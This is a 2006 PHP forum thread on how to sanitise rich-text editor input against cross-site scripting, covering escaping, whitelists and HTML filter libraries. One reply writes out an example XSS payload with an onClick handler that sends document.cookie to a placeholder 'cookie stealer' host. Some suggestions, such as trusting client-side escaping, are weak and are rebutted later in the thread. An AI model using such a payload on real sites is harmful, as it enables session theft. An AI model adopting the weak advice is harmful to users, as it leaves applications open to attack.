Page 1 of 1
Rich text editing
Posted: Thu Mar 16, 2006 12:00 pm
by Roja
If I have an extremely simple editing system (think blog, with little structure), and I add a rich text editor (such as FCKeditor), what general steps do I need to ensure security?
I'm presuming something like:
- Rich text editor for input
- Filter input (To remove what? How?)
- Add escaping for storage to DB
- Store to DB
- Pull from DB
- Escape output (To remove what? How?)
- Present output to user
The bolded items are the ones I am unclear on the specifics for, and would appreciate guidance. If we are allowing users to enter *rich text*, which includes html codes, I'm very unclear on the full range of items we need to filter to ensure no XSS, js attacks, and so forth.
I'm also unclear on the specifics of what you would escape in the output. By definition, we want html to come through, so what would we be htmlentities escaping?
Any specific guidance on these general concepts is appreciated. While I'm strong on security in other areas, these two items in this specific scenario is something I've always avoided as being too risky, but I can no longer do so.
Any pre-packaged solutions for any of the above steps is also welcome. By way of example, I'll be using adodb for the escaping for storage, and CRUD events. The solutions would need to be GPL-compatible.
Please be gentle. I know that I am normally one of the first people answering these types of questions, but this is an area where I am less confident, and I would appreciate the knowledge and understanding of the community to help me improve.
Posted: Thu Mar 16, 2006 12:09 pm
by Burrito
I can't give you an all-encompassing security resolution but I can start you off with this:
by default RTE's will automatically already be 'htmlentitied".
In other words, if I type in <script> in my RTE, it's going to interpret the "<" as < etc.
the way I've done it in the past is to use innerHTML of the element (usually an iframe) and copy that info to a hidden form var, then on post take the value of that form var and dump it into my db.
you'll still want to run it through mysql_real_escape_string() but other than that, I haven't run into any issues.
Posted: Thu Mar 16, 2006 3:32 pm
by pickle
The dangers in the input & output are possible execution of code, and broken xhtml code.
fckEditor (and most other RTEs) allow you to edit the source code directly. It's easy then, to post broken code which breaks your displaying web page. Perhaps writing a parser or somehow using a command line version of htmlTidy could at least tell you if the xhtml code is malformed.
As for stopping PHP code from being executed - that's easy. Just don't ever handle that string in such a way as to be executed.
Javascript may be a little more difficult. Inline javascript will, of course, have to be put inside <script></script> tags - so you could just parse the input and strip out those tags and anything they contain.
Posted: Thu Mar 16, 2006 9:16 pm
by Ambush Commander
Mmm... as of the market stands now, no pure-PHP solution is satisfactory, mainly because they don't really "know" about the HTML specification. I've been working on something that does, and let me tell you, it's not easy.
The "best" way to do it would be to...
1. Lex the HTML fragment according to the SGML standard into tokens (MarkupLexer, finished that)
2. Take tokens and pass them through a DTD, which knows about the specification and can check for many things:
* Proper nesting (not just "do all elements close" but "did they try to put a block level element in an inline one"?)
* Proper attribute formats (at least a dozen RFCs for each including URLs and CSS)
3. Recompile the tokens into HTML
4. Run a gauntlet of compatibility checks, attempting to eliminate any possible browser quirks that cause non-standard behavior and could compromise insecure browsers (esp. IE, this happens ALOT)
5. If changes where made, re-rinse, until the HTML stops changing
Of course, no one in their right mind would do it (except me). But any other solution is unsatisfactory. This is the main reason why forums use BBcode, and why most systems that actually have HTML parsing don't do it completely correctly, and are hideously complex.
(I believe I've harped about this in a previous thread already, but I can't remember what it was)
Posted: Thu Mar 16, 2006 9:35 pm
by josh
Burrito wrote: if I type in <script> in my RTE, it's going to interpret the "<" as < etc.
and if I telnet in and type <script> in my POST data its not going to escape anything
pickle wrote: Inline javascript will, of course, have to be put inside <script></script> tags
What about
Code: Select all
<p onMouseOver="armagedon(); return false;"></p>
Or things along those lines?
I would personally say use a "fuzzy" whitelist, using preg
if the rich text is allowing bold italics underline and colors for example you can match against each one in turn
Code: Select all
preg_match('@<span style="color:#?([a-zA-Z0-9]+)?;" >([a-zA-Z0-9]+)</span>@');
This is just an example, I suck at regex
Posted: Thu Mar 16, 2006 10:01 pm
by Ambush Commander
I don't understand: how does matching a regular expression help escape it?
Posted: Thu Mar 16, 2006 10:15 pm
by josh
you let the parts of the submitted string that match the expression slide by, and you htmlentities() the rest of the string. I guess you would swap out those pieces of text for placeholders, then swap them back in after the escaping?
Posted: Fri Mar 17, 2006 9:48 am
by pickle
jshpro2 wrote:
What about
Code: Select all
<p onMouseOver="armagedon(); return false;"></p>
Or things along those lines?
armagedon() will still have to be declared withing <script></script> tags. The worst that'll do (unless Roja defines a function armagedon()) is generate a script error....I think.
Posted: Fri Mar 17, 2006 9:56 am
by josh
That's an example. instead of calling that function you can put javascript right in there, here's a different example though:
Code: Select all
<a href="#" onClick="window.location.href='http://cookiestealer.com/script.php?ssid='+document.cookie">free beer click here</a>
no <script> tags needed
Posted: Fri Mar 17, 2006 3:09 pm
by Burrito
jshpro2 wrote:
and if I telnet in and type <script> in my POST data its not going to escape anything
so use a challenge / response on your form to prevent that
Posted: Sat Mar 18, 2006 3:47 pm
by Ambush Commander
Aw, come on, it's not that hard to spoof a challenge response (the challenge is for protection from third party attackers). Anything client side cannot be trusted. The RTF editor takes a WYSIWIG editor, translates it into HTML, and then sends it to the server as regular POST data.
Posted: Sun Mar 19, 2006 10:06 am
by shiflett
How much HTML do you want to allow? For simple things, I find it easiest to escape everything and then convert allowed entities back to their original form. This also lets you make sure the user has closed bold tags and things of that nature.
For more complex needs, you might find this helpful:
http://cyberai.com/inputfilter/
It lets you take a whitelist or blacklist approach with both tags and attributes, and it also has an option to automatically remove common problems.
Posted: Sun Mar 19, 2006 1:53 pm
by Ambush Commander
Note that inputfilter isn't perfect, and if you make it too permissive, it will let malicious output through (only because it doesn't actually know about the specification), although at the very least it will cause your document to stop validating (eg. it doesn't check proper nesting of blocks and inlines).